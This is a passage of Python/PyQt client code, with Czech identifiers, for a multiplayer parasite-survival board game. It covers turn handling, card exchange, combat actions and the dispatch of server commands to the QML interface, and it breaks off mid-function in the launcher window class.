@pyqtProperty(int, notify= humanChanged)\r\n def human(self):\r\n return self._human\r\n\r\n @human.setter\r\n def human(self, i):\r\n self._human = i\r\n self.humanChanged.emit()\r\n\r\n\r\n\r\n # SLOTS ------------------------------- SLOTS\r\n\r\n @pyqtSlot()\r\n def _endTurn(self):\r\n self.send(\"konec_kola\", ())\r\n\r\n @pyqtSlot(QVariant)\r\n def _newMeeting(self, pohyb):\r\n pohyb = [int(i) for i in pohyb.toVariant()]\r\n self._meeting = self.mapa.setkani(self._me, self._human, pohyb, True)\r\n self.meetingChanged.emit()\r\n\r\n pickPlayer= pyqtSignal(QVariant, str)\r\n @pyqtSlot(int)\r\n def _pickPlayer(self, clovek):\r\n \"\"\"\r\n :param clovek: mluví za vše\r\n\r\n Zjistí s kým se hráč v místnosti setká, v jaké místnosti je, a jaké akce zde může použít\r\n \"\"\"\r\n akce = [False, False, False, False]\r\n if self.mapa.hrac.ma_predmet(\"Scanner\") and self._meeting: akce[0] = True\r\n if self.mapa.hrac.naboje and self._meeting: akce[1] = True\r\n if self.mapa.hrac.ma_predmet(\"Grenade\"): akce[2] = True\r\n if self.mapa.hrac.vylozeno[0] and self._meeting: akce[3] = True\r\n y, x = self.mapa.hrac.pos[clovek]\r\n mistnost = self.mapa.mapakaret[y][x][0]\r\n self.pickPlayer.emit(akce, mistnost)\r\n\r\n tryHeal = pyqtSignal(int)\r\n @pyqtSlot(str)\r\n def _useCard(self, jmeno):\r\n if jmeno == \"FirstAid\": self.tryHeal.emit(-1)\r\n elif jmeno == \"EnergyDrink\": self.send(\"energit\", ())\r\n elif jmeno in (\"Ammo\", \"Riffle\", \"Scope\", \"Card\", \"Knife\"): self.send(\"vyloz_kartu\", (jmeno, ))\r\n\r\n @pyqtSlot(str, int, int, int) #karta, clovek(ja), cil(jm)\r\n def _changeCards(self, karta, clovek, jmT, clovekT):\r\n #print(\"budou se menit karty\")\r\n self.send(\"vymen_kartu\", (karta, clovek, jmT, clovekT))\r\n\r\n @pyqtSlot(int)\r\n def _cover(self, clovek):\r\n self.send(\"kryti_vestou\", (clovek, ))\r\n\r\n tryMove = pyqtSignal(int, int)\r\n @pyqtSlot(int, int, int)\r\n def _tryMove(self, y, x, clovek):\r\n \"\"\"\r\n Zjistí jestli je možné se do místnosti pohnout\r\n \"\"\"\r\n y1, x1 = self.mapa.hrac.pos[clovek]\r\n yp, xp = y - y1, x - x1\r\n if not((yp in (1, -1) and xp == 0) or (xp in (1, -1) and yp == 0)): return #Kontroluji, jestli se pohybuje pouze o jedno políčko\r\n if self.mapa.kolize(self._me, clovek, (yp, xp)): return #Musí tam být průchod\r\n self.tryMove.emit(y, x)\r\n\r\n @pyqtSlot(int, int, int)\r\n def _movePlayer(self, y, x, clovek):\r\n y1, x1 = self.mapa.hrac.pos[clovek]\r\n pohyb = (y - y1, x - x1)\r\n self.send(\"pohyb_hrace\", (clovek, pohyb))\r\n\r\n @pyqtSlot(int, int, int, int)\r\n def _drawCard(self, clovek, jmT, clovekT, parazit):\r\n if parazit > -1: jmT = self._me\r\n self.send(\"prohledat_mistnost\", (clovek, jmT, clovekT))\r\n\r\n @pyqtSlot()\r\n def _burn(self):\r\n self.send(\"vypal_hnizdo\", ())\r\n\r\n @pyqtSlot(int, int)\r\n def _heal(self, clovek, h):\r\n self.send(\"vylecit_nem\", (clovek, h))\r\n\r\n @pyqtSlot(int, int)\r\n def _healPlayer(self, h1, h2):\r\n self.send(\"vylecit_kar\", (h1, h2))\r\n\r\n @pyqtSlot(int)\r\n def _scan(self, clovek):\r\n self.send(\"plosny_scan\", (clovek, ))\r\n\r\n @pyqtSlot(int, int, int)\r\n def _scanPlayer(self, clovek, jmT, clovekT):\r\n #print(\"scan\")\r\n self.send(\"scan\", (clovek, jmT, clovekT))\r\n\r\n @pyqtSlot(int)\r\n def _openDoors(self, clovek):\r\n self.send(\"otevri_dvere\", (clovek, ))\r\n\r\n @pyqtSlot(int, QVariant)\r\n def _throwGrenade(self, clovek, pohyb):\r\n pohyb= [int(i) for i in pohyb.toVariant()]\r\n self.send(\"granat\", (clovek, pohyb))\r\n\r\n @pyqtSlot(int, int ,int)\r\n def _stab(self, jmT, clovekT, parazit):\r\n if parazit > -1: cil= (parazit, None)\r\n else: cil= (jmT, clovekT)\r\n self.send(\"bodnuti\", cil)\r\n\r\n @pyqtSlot(int, int, int, QVariant)\r\n def _shoot(self, jmT, clovekT, parazit, pohyb):\r\n pohyb= [int(i) for i in pohyb.toVariant()]\r\n if parazit > -1: self.send(\"strelba\", (parazit, None, pohyb))\r\n else: self.send(\"strelba\", (jmT, clovekT, pohyb))\r\n\r\n\r\n @pyqtSlot()\r\n def _spawn(self):\r\n self.send(\"spawn\", ())\r\n\r\n @pyqtSlot(int, int, int, int)\r\n def _placeRoom(self, clovek, y, x, reversed):\r\n \"\"\" Zkontroluje, jestli je na souřadnicích y,x objevit místnost, a odešle příkaz na server \"\"\"\r\n argumenty= self.mapa._objevit_mistnost(clovek, y, x, reversed)\r\n if argumenty:\r\n self.send(\"objevit_mistnost\", (argumenty))\r\n\r\n\r\n @pyqtSlot()\r\n def _close(self):\r\n #print (\"QUIT\")\r\n view.gWindow.close()\r\n\r\n\r\n # -----------------POMOCNÉ FUNKCE-------------------\r\n\r\n def close(self):\r\n view.gWindow = None\r\n self.client.command.disconnect()\r\n self.client.command.connect(view.rootObject().command)\r\n if not self.END: view.rootObject()._disconnect()\r\n\r\n def updateMeeting(self, pohyb= (0, 0)):\r\n \"\"\"\r\n vytvoří nový seznam setkání (používá se při pušce a granátu)\r\n :param mistnost: určuje směr setkání\r\n \"\"\"\r\n self._meeting= self.mapa.setkani(self._me, self._human, pohyb, True)\r\n self.meetingChanged.emit()\r\n\r\n def timer(self):\r\n \"\"\"\r\n Upraví čas na odpočtu každou sekundu...\r\n \"\"\"\r\n if self.pauza or self._timeTo < 1: return\r\n self._timeTo -= 1\r\n self.timeToChanged.emit()\r\n\r\n def addToHand(self, hrac, predmet):\r\n self._cards[hrac]+=1\r\n self.cardsChanged.emit()\r\n if hrac != self._me: return\r\n if predmet[:-1] == \"Blood\": return\r\n if not self.mapa.hrac.predmety[predmet]: # Hráč nemá předmět, a proto budu muset appendovat do _cardsInHand\r\n self._cardsInHand.append([predmet, 1])\r\n else: # Najdu pozici předmetu v _cardsInHand a zvýším jeho počet o jedna\r\n for i in range(len(self._cardsInHand)):\r\n if self._cardsInHand[i][0] == predmet:\r\n self._cardsInHand[i][1] += 1\r\n break\r\n\r\n self.newItem.emit(predmet)\r\n self.cardsInHandChanged.emit()\r\n\r\n def removeFromHand(self, hrac, predmet):\r\n self._cards[hrac] -= 1\r\n self.cardsChanged.emit()\r\n if hrac != self._me: return\r\n\r\n\r\n if predmet[:-1] == \"Blood\": return\r\n\r\n if self.mapa.hrac.predmety[predmet] == 1:\r\n self._cardsInHand.remove([predmet, 1])\r\n else: #Najdu pozici předmetu v _cardsInHand a snížím jeho počet o jedna\r\n for i in range(len(self._cardsInHand)):\r\n if self._cardsInHand[i][0] == predmet:\r\n self._cardsInHand[i][1] -= 1\r\n break\r\n self.cardsInHandChanged.emit()\r\n\r\n def action(self):\r\n self._actionPoints -=1\r\n self.actionPointsChanged.emit()\r\n\r\n\r\n def __init__(self, parent= None):\r\n super(Game, self).__init__(parent)\r\n self.f()\r\n\r\n self._connections= []\r\n self._positions = []\r\n self._hitPoints = []\r\n self._avatars = []\r\n self._cardsOnBoard = []\r\n self._ammos = []\r\n self._cards = []\r\n self._cardsInHand= []\r\n self._meeting = []\r\n self._parasites= []\r\n self._blood= []\r\n self._names= []\r\n\r\n self._nextRoom= \"\"\r\n\r\n self._timeTo = 100\r\n self._actionPoints = 0\r\n self._me = 0\r\n self._itemCardsLeft = 0\r\n self._roomCardsLeft = 0\r\n self._parasiteTurn= 0\r\n self._playing= 0\r\n self._openedDoor= -1\r\n self._human = 1\r\n\r\n self._corrupted = False\r\n # ----\r\n\r\n\r\n self.mapa = None\r\n self.hraje = None\r\n self.pauza = True\r\n self.casNaKolo = 100\r\n\r\n self.odpocet = QTimer(self)\r\n self.odpocet.timeout.connect(self.timer)\r\n self.odpocet.start(1000)\r\n\r\n self.END = False\r\n\r\n\r\n def setClient(self, client):\r\n self.client= client\r\n self.send= client.sendMessage\r\n\r\n self.client.command.connect(self.proved)\r\n view.gWindow.closed.connect(self.close)\r\n\r\n\r\n addMusic = pyqtSignal(str)\r\n addEffect = pyqtSignal(str)\r\n def setSound(self, sound):\r\n self.addMusic.connect(sound.addMusic)\r\n self.addEffect.connect(sound.addEffect)\r\n self.sound = sound\r\n\r\n\r\n def pristi_mistnost(self):\r\n self._nextRoom= str(self.mapa.pristimistnost[3])\r\n self._roomCardsLeft -= 1\r\n self.roomCardsLeftChanged.emit()\r\n self.nextRoomChanged.emit()\r\n\r\n def proved(self, h, nazev, args):\r\n self.zadavatel= h\r\n self.funkce[nazev](args)\r\n\r\n def nove_spojeni(self, args):\r\n \"\"\"\r\n :param args: int(index hráče)\r\n \"\"\"\r\n self._connections[self.zadavatel] = True\r\n # Hráč se připojil\r\n\r\n def odpojeni_hrace(self, args):\r\n \"\"\"\r\n :param args: int(index hráče)\r\n \"\"\"\r\n self._connections[args[0]] = False\r\n self.connectionsChanged.emit()\r\n # Hráč se odpojil\r\n\r\n def pripojeni_hrace(self, args):\r\n self._connections[self.zadavatel] = True\r\n self.connectionsChanged.emit()\r\n\r\n newRoom = pyqtSignal(int, int, str, int, bool) #Přidá místnost na mapu\r\n def priprava_hry(self, mapa, pocet):\r\n self.mapa= mapa\r\n self._me = mapa.ja\r\n self._connections= [\"connected\" for _ in range(pocet)]\r\n self.pristi_mistnost()\r\n #Vykreslím mapu\r\n for y, r in enumerate(self.mapa.mapakaret):\r\n for x, m in enumerate(r):\r\n if m:\r\n prevratit = m.pop() and 1 or 0\r\n pouzita = m[-2] and True or False\r\n self.newRoom.emit(y, x, m[-1], prevratit, pouzita)\r\n #Inicializuji hráče (mě)\r\n self._cardsInHand = self.mapa.hrac.seznamPredmetu()\r\n self._corrupted = self.mapa.hrac.nakazeny\r\n self.corruptedChanged.emit()\r\n self._blood = self.mapa.hrac.krve\r\n #Inicializuji hráče (ostatní)\r\n for hrac in self.mapa.hraci:\r\n me = hrac.me()\r\n self._positions.append(me[0])\r\n self._hitPoints.append(me[1])\r\n self._avatars.append(me[2])\r\n self._cardsOnBoard.append(me[3])\r\n self._names.append(me[4])\r\n self._ammos.append(me[5])\r\n self._cards.append(me[6])\r\n\r\n #Inicalizuji proměnné\r\n self._parasites = self.mapa.paraziti\r\n\r\n self.positionsChanged.emit()\r\n self.hitPointsChanged.emit()\r\n self.avatarsChanged.emit()\r\n self.cardsOnBoardChanged.emit()\r\n self.namesChanged.emit()\r\n self.ammosChanged.emit()\r\n self.cardsChanged.emit()\r\n\r\n self.connectionsChanged.emit()\r\n self.cardsInHandChanged.emit()\r\n self.bloodChanged.emit()\r\n self.parasitesChanged.emit()\r\n\r\n for i in range(len(self._positions)):\r\n if self._positions[i][0][0] > -1 or self._positions[i][1][0] > -1:\r\n self.spawnPlayer.emit(i) # Pokud jsem se odpojil a připojil!\r\n\r\n def priprava_kola(self, hraje, koloP, zMistnosti, zKarty, dvere, ap):\r\n \"\"\"\r\n :param hraje: int(kdo hraje)\r\n :param koloP: int(kdy hraji paraziti)\r\n :param zMistnosti: int(kolik zbyva mistnosti)\r\n :param zKarty: int(kolik zbyva karet)\r\n :param dvere: bool(jsou dvere otevrene)\r\n :param ap: int(kolik zbyva akcnich bodu)\r\n \"\"\"\r\n self._playing = hraje\r\n self._parasiteTurn = koloP\r\n self._roomCardsLeft = zMistnosti\r\n self._itemCardsLeft = zKarty\r\n self._openedDoor = dvere\r\n self._actionPoints = ap\r\n\r\n self.mapa.otevrenedvere= dvere\r\n\r\n self.playingChanged.emit()\r\n self.parasiteTurnChanged.emit()\r\n self.itemCardsLeftChanged.emit()\r\n self.roomCardsLeftChanged.emit()\r\n self.openedDoorChanged.emit()\r\n self.actionPointsChanged.emit()\r\n\r\n changeCards = pyqtSignal(int) # Budou se měnit karty\r\n def pohyb_hrace(self, args):\r\n \"\"\"\r\n :param args: int(klon|clovek), tuple(pohyb), tah\r\n :return:\r\n \"\"\"\r\n clovek, pohyb, tah= args\r\n setkani = self.mapa.pohyb_hrace(self.zadavatel, clovek, pohyb) #Tohle už s ním pohne\r\n #self._positions[self.zadavatel][clovek] = self.mapa.hraci[self.zadavatel].pos[clovek]\r\n self.positionsChanged.emit()\r\n if setkani != [[0, 0, 0]] and self.zadavatel == self._me:\r\n self._meeting= setkani\r\n self.meetingChanged.emit()\r\n self.changeCards.emit(clovek)\r\n #print(\"vymena karet\", clovek, self._meeting)\r\n\r\n if tah: self.action()\r\n\r\n\r\n placeRoom = pyqtSignal(int, int, int, int, int) #Objev místnost\r\n def objevit_mistnost(self, args):\r\n \"\"\"\r\n :param args: list, int, int, int, int, int (Viz dole)\r\n obnoví příští_místnost + přidá místnost na mapu\r\n \"\"\"\r\n pos, mistnost, prevratit, pmistnost, jm, clovek= args #pmistnost = pristi mistnost\r\n self.mapa.objevit_mistnost(pos, mistnost, prevratit, pmistnost)\r\n\r\n self.placeRoom.emit(pos[0], pos[1], prevratit, jm, clovek)\r\n self.pristi_mistnost()\r\n\r\n self.action()\r\n\r\n changingCards = pyqtSignal(int, int, int, int)\r\n def vymen_kartu(self, args):\r\n \"\"\"\r\n Tady by asi stálo za to, trošku podrobnějí rozebrat tu šílenou změť signálů při výměně karet:\r\n Po pohybu hráče se zkontroloje s kým se v místnosti setkal, pokud se tak stane, odešle se do hry signál \"changeCards\" ->\r\n -> to znamená že si hráč vybere s kým bude měnit a jakou kartu vymění - až to udělá, zavolá se slot \"_changecards\" ->\r\n -> to způsobí odeslání požadavku na server, který pak odpoví příkazem \"vymen_kartu\" což emitne signál \"changingCards\" ->\r\n -> v této chvíli dostane druhý hráč požadavek o výměnu své karty a požadavek se poté opět odešle na server a ten pak vrátí odpoveď \"vymena_karet\" ->\r\n -> signál \"allCardsChanged\": teď teprve se oběma hráčům zobrazí karty, které dostaly od spoluhráče a hra může pokračovat dál\r\n UFF...\r\n\r\n :param args: int(clovek|klon -- pro prvního hráče), int(index druhého hráče), int(clovek|klon -- pro druhého hráče)\r\n Vykreslí na mapě akci výměny mezi hráči\r\n \"\"\"\r\n if args[1] == self._me:\r\n self._meeting= [[False, False, self.zadavatel], [0, 0, 0]]\r\n self._meeting[0][args[0]] = True\r\n self.meetingChanged.emit()\r\n self.changingCards.emit(self.zadavatel, *args)\r\n\r\n allCardsChanged = pyqtSignal(str)\r\n def vymena_karet(self, args):\r\n \"\"\"\r\n Odeberu hráči odevzdaný předmět a dám mu nový\r\n :param args: list(karta2, karta1)\r\n \"\"\"\r\n #print(\"VYMENA\", args)\r\n if self._playing == self._me:\r\n k1, k2, nakazeny = args\r\n else:\r\n k2, k1, nakazeny = args\r\n\r\n if not self._corrupted and nakazeny == self._me:\r\n self._corrupted = True\r\n self.corruptedChanged.emit()\r\n\r\n self.allCardsChanged.emit(k1)\r\n\r\n if k1 != k2:\r\n self.addToHand(self._me, k1)\r\n self.removeFromHand(self._me, k2)\r\n\r\n self.mapa.hrac.spravuj_predmet(k1, 1)\r\n self.mapa.hrac.spravuj_predmet(k2, -1)\r\n\r\n self.bloodChanged.emit() # Pro případ, že by se měnili krve\r\n\r\n\r\n shootPlayer = pyqtSignal(int, int, int, QVariant, int)\r\n shootParasite = pyqtSignal(int, int, QVariant, int)\r\n def strelba(self, args):\r\n \"\"\"\r\n :param args: int(poskozeni), tuple(cil), tuple(pohyb)\r\n \"\"\"\r\n self.sound.addEffect(\"Music\\gun-shot.wav\")\r\n poskozeni, jmT, clovekT, pohyb = args\r\n self.mapa.hraci[self.zadavatel].odeber_naboje(poskozeni)\r\n self._ammos[self.zadavatel] -= poskozeni\r\n self.ammosChanged.emit()\r\n if clovekT is None:\r\n pozice = self.mapa.hraci[self.zadavatel].pos[0][:]\r\n pozice[0] += pohyb[0]\r\n pozice[1] += pohyb[1]\r\n mrtvy= self.mapa.zranit_parazita(pozice, jmT)\r\n #self._parasites = self.mapa.paraziti\r\n self.parasitesChanged.emit()\r\n self.updateMeeting()\r\n self.shootParasite.emit(self.zadavatel, jmT, pohyb, poskozeni)\r\n else:\r\n self.shootPlayer.emit(self.zadavatel, jmT, clovekT, pohyb, poskozeni)\r\n\r\n\r\n stabPlayer= pyqtSignal(int, int, int, int)\r\n stabParasite= pyqtSignal(int, int, int)\r\n def bodnuti(self, args):\r\n \"\"\"\r\n Ubere hráčům životy a vykreslí bodnutí\r\n :param args: bool(povedlo se?), int(ind), tuple(cil)\r\n \"\"\"\r\n self.sound.addEffect(\"Music\\slash.wav\")\r\n poskozeni, jmT, clovekT = args\r\n if clovekT is None:\r\n if poskozeni:\r\n pozice = self.mapa.hraci[self.zadavatel].pos[1]\r\n mrtvy= self.mapa.zranit_parazita(pozice, jmT)\r\n #self._parasites = self.mapa.paraziti\r\n self.parasitesChanged.emit()\r\n self.updateMeeting()\r\n else:\r\n mrtvy = False\r\n self.stabParasite.emit(self.zadavatel, jmT, poskozeni)\r\n else:\r\n mrtvy= self.mapa.hraci[jmT].zranit(poskozeni, clovekT)\r\n #self._hitPoints[jmT]= self.mapa.hraci[clovekT].zivoty\r\n self.stabPlayer.emit(self.zadavatel, jmT, clovekT, poskozeni)\r\n self.hitPointsChanged.emit()\r\n self.positionsChanged.emit() #Kdyby někdo umřel\r\n self.action()\r\n\r\n\r\n throwGrenade = pyqtSignal(int, int, QVariant)\r\n def granat(self, args):\r\n \"\"\" \r\n Ubere hráčům životy a vykreslí hod granátem\r\n :param args: ind, pohyb\r\n \"\"\"\r\n clovek, pohyb= args\r\n\r\n zraneni = [[False, False] for _ in range(len(self._connections))] + [[0, 0]]\r\n y = self.mapa.hraci[self.zadavatel].pos[clovek][0] + pohyb[0]\r\n x = self.mapa.hraci[self.zadavatel].pos[clovek][1] + pohyb[1]\r\n for i, h in enumerate(self.mapa.hraci):\r\n if h.pos[0] == [y, x]:\r\n zraneni[i][0] = True\r\n h.zranit(1, 0)\r\n if h.pos[1] == [y, x]:\r\n zraneni[i][1] = True\r\n h.zranit(1, 1)\r\n paraziti = []\r\n for p in self.mapa.paraziti:\r\n if p[0] == [y, x]:\r\n if p[2] == 2:\r\n paraziti.append([p[0], p[1], 1])\r\n zraneni[-1][1] += p[1]\r\n else:\r\n zraneni[-1][0] += p[1]\r\n else:\r\n paraziti.append(p)\r\n\r\n self.sound.addEffect(\"Music\\grenade-throw.wav\")\r\n\r\n self._parasites = self.mapa.paraziti = paraziti\r\n\r\n\r\n self.throwGrenade.emit(self.zadavatel, clovek, zraneni)\r\n\r\n\r\n self.removeFromHand(self.zadavatel, \"Grenade\")\r\n self.mapa.hraci[self.zadavatel].spravuj_predmet(\"Grenade\", -1)\r\n\r\n self.disableMovement.emit() #Aby mi paraziti nelítaly přes celou mapu\r\n self.parasitesChanged.emit()\r\n self.hitPointsChanged.emit()\r\n self.positionsChanged.emit() #Kdyby někdo umřel\r\n self.action()\r\n\r\n healPlayer = pyqtSignal(int)\r\n def vylecit_kar(self, args):\r\n \"\"\"\r\n :param args: int(+HP klon), int(+HP člověk)\r\n \"\"\"\r\n self.removeFromHand(self.zadavatel, \"FirstAid\")\r\n self.mapa.hraci[self.zadavatel].vylecit(*args)\r\n\r\n #self._hitPoints[self.zadavatel] = self.mapa.hraci[self.zadavatel].zivoty\r\n self.hitPointsChanged.emit()\r\n self.healPlayer.emit(self.zadavatel)\r\n\r\n heal = pyqtSignal(int, int)\r\n def vylecit_nem(self, args):\r\n \"\"\"\r\n :param args: int(clovek), int(+HP)\r\n \"\"\"\r\n self.mapa.hraci[self.zadavatel].zivoty[args[0]] += args[1]\r\n #self._hitPoints[self.zadavatel] = h.zivoty\r\n self.hitPointsChanged.emit()\r\n self.heal.emit(self.zadavatel, args[0])\r\n\r\n redBull = pyqtSignal(int)\r\n def energit(self, args):\r\n \"\"\" Přidá dva tahy navíc \"\"\"\r\n self.removeFromHand(self.zadavatel, \"EnergyDrink\")\r\n self.mapa.hraci[self.zadavatel].spravuj_predmet(\"EnergyDrink\", -1)\r\n self._actionPoints += 2\r\n self.actionPointsChanged.emit()\r\n self.redBull.emit(self.zadavatel)\r\n\r\n def konec_kola(self, args):\r\n self.pauza = True\r\n\r\n self._playing= -1\r\n self.playingChanged.emit()\r\n\r\n\r\n newTurn= pyqtSignal(int)\r\n def nove_kolo(self, args):\r\n self._playing= args[0]\r\n if self.mapa.otevrenedvere == self._playing:\r\n self.mapa.otevrenedvere = self._openedDoor = -1\r\n self.openedDoorChanged.emit()\r\n self.newTurn.emit(self.hraje)\r\n self.pauza= False\r\n\r\n self._timeTo= self.casNaKolo\r\n self._actionPoints= self.mapa.hraci[self._playing].tahy()\r\n\r\n self.timeToChanged.emit()\r\n self.playingChanged.emit()\r\n self.actionPointsChanged.emit()\r\n\r\n\r\n spawnPlayer = pyqtSignal(int)\r\n def spawn(self, args):\r\n self.mapa.hraci[self.zadavatel].spawn()\r\n #self.positions[self.zadavatel] = self.mapa.hraci[self.zadavatel].pos\r\n self.positionsChanged.emit()\r\n self.spawnPlayer.emit(self.zadavatel)\r\n\r\n scanPlayer = pyqtSignal(int, int, int, int, QVariant, QVariant) #Skenoval jsem já\r\n def scan(self, args):\r\n \"\"\"\r\n Zobrazí karty cílového hráče\r\n :param args: list(seznam karet) -- nepovinne, int (cil)\r\n :return:\r\n \"\"\"\r\n self.removeFromHand(self.zadavatel, \"Scanner\")\r\n self.mapa.hraci[self.zadavatel].spravuj_predmet(\"Scanner\", -1)\r\n if self.zadavatel == self._me:\r\n self.scanPlayer.emit(self.zadavatel, *args)\r\n else:\r\n self.scanPlayer.emit(self.zadavatel, args[0], args[1], args[2], [], [])\r\n\r\n self.action()\r\n\r\n scanAllPlayers = pyqtSignal(int, int, int)\r\n def plosny_scan(self, args):\r\n \"\"\"\r\n Zobrazí počet nakažených hráčů\r\n :param args: int(clovek| klon), int(počet nakažených)\r\n \"\"\"\r\n self.scanAllPlayers.emit(self.zadavatel, *args)\r\n QTimer.singleShot(1000, lambda: self.sound.addEffect(\"Music\\scream.wav\"))\r\n self.action()\r\n\r\n openDoors = pyqtSignal(int ,int)\r\n def otevri_dvere(self, args):\r\n self.action()\r\n self._openedDoor = self.mapa.otevrenedvere = self.zadavatel\r\n self.openDoors.emit(self.zadavatel, args[0])\r\n self.openedDoorChanged.emit()\r\n\r\n burn = pyqtSignal(int)\r\n def vypal_hnizdo(self, args):\r\n \"\"\" ! GangBang ! \"\"\"\r\n self.burn(self.zadavatel)\r\n\r\n useCard = pyqtSignal(int, str)\r\n def vyloz_kartu(self, args):\r\n self.removeFromHand(self.zadavatel, args[0])\r\n self.mapa.hraci[self.zadavatel].vyloz_predmet(args[0])\r\n self.useCard.emit(self.zadavatel, args[0])\r\n if args[0] == \"Ammo\":\r\n self._ammos[self.zadavatel] = self.mapa.hraci[self.zadavatel].naboje\r\n self.ammosChanged.emit()\r\n else:\r\n #self._cardsOnBoard[self.zadavatel] = self.mapa.hraci[self.zadavatel].vylozeno\r\n self.cardsOnBoardChanged.emit()\r\n\r\n\r\n parasiteMovement = pyqtSignal(QVariant) #Udělí zranění a počká na použití vest\r\n def pohyb_parazitu(self, args):\r\n \"\"\"\r\n Zobrazí přesun parazitů\r\n :param args: příští kolo parazitů, pohyb, zranění hráči\r\n \"\"\"\r\n\r\n paraziti = self.mapa.pohyb_parazitu(args[0])\r\n\r\n self.parasitesChanged.emit()\r\n\r\n QC.QTimer.singleShot(620, lambda : self.poPohybu(paraziti, args[1]))\r\n\r\n self.parasiteTurnChanged.emit()\r\n\r\n #pohyb_parazitu a poPohybu patří k sobě\r\n\r\n disableMovement= pyqtSignal() #Zruší dočasně animace pohybu parazitů\r\n def poPohybu(self, paraziti, zraneni):\r\n self.disableMovement.emit()\r\n self._parasites = self.mapa.paraziti = paraziti\r\n self.parasitesChanged.emit()\r\n if zraneni:\r\n self.parasiteMovement.emit(zraneni)\r\n\r\n turnAround = pyqtSignal(int, int)\r\n def otoc_mistnost(self, args):\r\n y, x = args\r\n self.mapa.mapakaret[y][x][-1] = False\r\n self.turnAround.emit(y, x)\r\n\r\n summonParasite = pyqtSignal(QVariant, int)\r\n def vyvolej_parazita(self, args):\r\n if args[0] is not None: #Přitáhnu parazita\r\n i, souradnice = args\r\n self.mapa.pritahni_parazita(i, souradnice)\r\n else: #Vytvořím parazita\r\n self.mapa.vyvolej_parazita(args[1])\r\n self.summonParasite.emit(*args[1])\r\n\r\n #self._parasites= self.mapa.paraziti\r\n self.parasitesChanged.emit()\r\n\r\n shootResult = pyqtSignal(int, int, int, int)\r\n def hrac_utoci(self, args):\r\n jm, jmT, clovekT, poskozeni= args\r\n mrtvy= self.mapa.hraci[jmT].zranit(poskozeni, clovekT)\r\n #self._hitPoints[cil[1]]= self.mapa.hraci[cil[1]].zivoty\r\n self.shootResult.emit(jm, jmT, clovekT, poskozeni)\r\n self.hitPointsChanged.emit()\r\n self.positionsChanged.emit() #Kdyby někdo umřel\r\n self.action()\r\n\r\n parasiteAttackResult = pyqtSignal(QVariant)\r\n def paraziti_utoci(self, args):\r\n \"\"\"\r\n :param args: seznam zraneni, pristiKoloParazitu\r\n \"\"\"\r\n self._parasiteTurn= args[1]\r\n self.parasiteTurnChanged.emit()\r\n\r\n zraneni= args[0]\r\n if not zraneni: return\r\n for h, z in zip(self.mapa.hraci, zraneni):\r\n h.zranit(z[0], 0)\r\n h.zranit(z[1], 1)\r\n\r\n zraneni.append([0, 0]) # Paraziti ... - Aby se to mohlo vykreslit...\r\n\r\n self.parasiteAttackResult.emit(zraneni)\r\n self.hitPointsChanged.emit()\r\n self.positionsChanged.emit() #Kdyby někdo umřel - odstraní ho z mapy\r\n\r\n def kryti_vestou(self, args):\r\n self.removeFromHand(self.zadavatel, \"Vest\")\r\n self.mapa.hraci[self.zadavatel].spravuj_predmet(\"Vest\", -1)\r\n\r\n\r\n drawCard = pyqtSignal(int, int)\r\n newItem = pyqtSignal(str) #Přidá hráči (mě) předmět\r\n def lizani_karet(self, args):\r\n \"\"\"\r\n :param args: jm int(hráč který si líznul kartu), clovek, tah, nepovinný : string(predmet)\r\n :return:\r\n \"\"\"\r\n jm, clovek, tah = args[0], args[1], args[2]\r\n if len(args) == 4:\r\n predmet= args[3]\r\n else:\r\n predmet = \"\"\r\n if predmet != \"Parasite\":\r\n self.addToHand(jm, predmet)\r\n self.mapa.hraci[jm].spravuj_predmet(predmet, 1)\r\n else:\r\n if predmet == \"Infection\":\r\n self._corrupted = True\r\n self.corruptedChanged.emit()\r\n self.newItem.emit(predmet)\r\n\r\n self.drawCard.emit(jm, clovek)\r\n if tah: self.action()\r\n self._itemCardsLeft -= 1\r\n self.itemCardsLeftChanged.emit()\r\n self.updateMeeting()\r\n\r\n outOfCards = pyqtSignal()\r\n def dosly_karty(self, args):\r\n self.outOfCards.emit()\r\n\r\n endGame = pyqtSignal(bool)\r\n def konec(self, args):\r\n self.endGame.emit(args[0] is args[1][self._me])\r\n self.END = True\r\n self.pauza = True\r\n\r\n\r\n def chyba(self, args):\r\n print (\"KLIENT: Nastala chyba na straně serveru: \", args)\r\n\r\n def chybna_akce(self, args):\r\n print (\"KLIENT: Tento požadavek nelze splnit: \", args)\r\n\r\n def f(self):\r\n self.funkce= {\r\n \"nove_spojeni\": self.nove_spojeni,\r\n \"odpojeni_hrace\": self.odpojeni_hrace,\r\n \"pripojeni_hrace\": self.pripojeni_hrace,\r\n \"pohyb_hrace\": self.pohyb_hrace,\r\n \"objevit_mistnost\": self.objevit_mistnost,\r\n \"vymen_kartu\": self.vymen_kartu,\r\n \"vymena_karet\": self.vymena_karet,\r\n \"strelba\": self.strelba,\r\n \"bodnuti\": self.bodnuti,\r\n \"granat\": self.granat,\r\n \"vylecit_kar\": self.vylecit_kar,\r\n \"vylecit_nem\": self.vylecit_nem,\r\n \"energit\": self.energit,\r\n \"konec_kola\": self.konec_kola,\r\n \"nove_kolo\": self.nove_kolo,\r\n \"spawn\": self.spawn,\r\n \"scan\": self.scan,\r\n \"plosny_scan\": self.plosny_scan,\r\n \"otevri_dvere\": self.otevri_dvere,\r\n \"vypal_hnizdo\": self.vypal_hnizdo,\r\n \"vyloz_kartu\": self.vyloz_kartu,\r\n \"pohyb_parazitu\": self.pohyb_parazitu,\r\n \"otoc_mistnost\": self.otoc_mistnost,\r\n \"vyvolej_parazita\": self.vyvolej_parazita,\r\n \"dosly_karty\": self.dosly_karty,\r\n \"lizani_karet\": self.lizani_karet,\r\n \"hrac_utoci\": self.hrac_utoci,\r\n \"paraziti_utoci\": self.paraziti_utoci,\r\n \"kryti_vestou\": self.kryti_vestou,\r\n \"konec\": self.konec,\r\n \"chyba\": self.chyba,\r\n \"chybna_akce\": self.chybna_akce,\r\n }\r\n\r\n\r\n\r\n\r\nclass LauncherWindow(QQuickView):\r\n\r\n def __init__(self, parent=None):\r\n super(LauncherWindow, self).__init__(parent)\r\n #self.setFlags(QC.Qt.Window|QC.Qt.FramelessWindowHint)\r\n\r\n self.setSource(\r\n QUrl.fromLocalFile(\r\n find_data_file(\"LauncherUI\\Launcher.qml\")))\r\n self.setResizeMode(QQuickView.SizeViewToRootObject)\r\n\r\n\r\n self.setMaximumHeight(600)\r\n self.setMaximumWidth(800)\r\n self.setMinimumHeight(600)\r\n self.setMinimumWidth(800)\r\n\r\n self.center()\r\n\r\n def center(self):\r\n #Center the window\r\n desktop = QGuiApplication.primaryScreen().geometry()\r\n size = self.geometry()\r\n width, height = desktop.width(), desktop.height()\r\n mw, 